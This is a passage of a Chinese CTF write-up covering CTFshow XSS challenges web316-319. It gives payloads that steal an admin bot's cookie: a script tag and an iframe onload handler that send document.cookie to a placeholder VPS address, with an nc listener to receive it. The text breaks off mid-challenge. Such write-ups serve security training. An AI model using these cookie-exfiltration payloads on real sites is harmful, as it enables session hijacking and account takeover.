CTFshow XSS(web316-333)

本文详细解析了一系列CTFshow的XSS挑战,从web316到web333,涵盖各种XSS攻防技巧。包括利用frame注入、绕过过滤、存储型XSS、Ajax提交与源代码获取等方法,逐步解密并获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >


web316

思路

直接输入<script>alert(1)</script>,能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。

考虑cookie外带

题解

?msg=<script>window.open("vps_ip"+document.cookie)</script>
#vps
nc -lvnp 8080
多试几次,因为nc只能接收一次

在这里插入图片描述

web317

思路

输入script发现输出为空,说明被题目限制了,但是<>还是可以使用的

题解

可以用frame注入

<iframe onload="window.open('http://ip/?q='+document.cookie)"></iframe>

web318-319

思路

fuzz了一下发现是把img替换成空

题解

可以用frame注入

<iframe onload
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值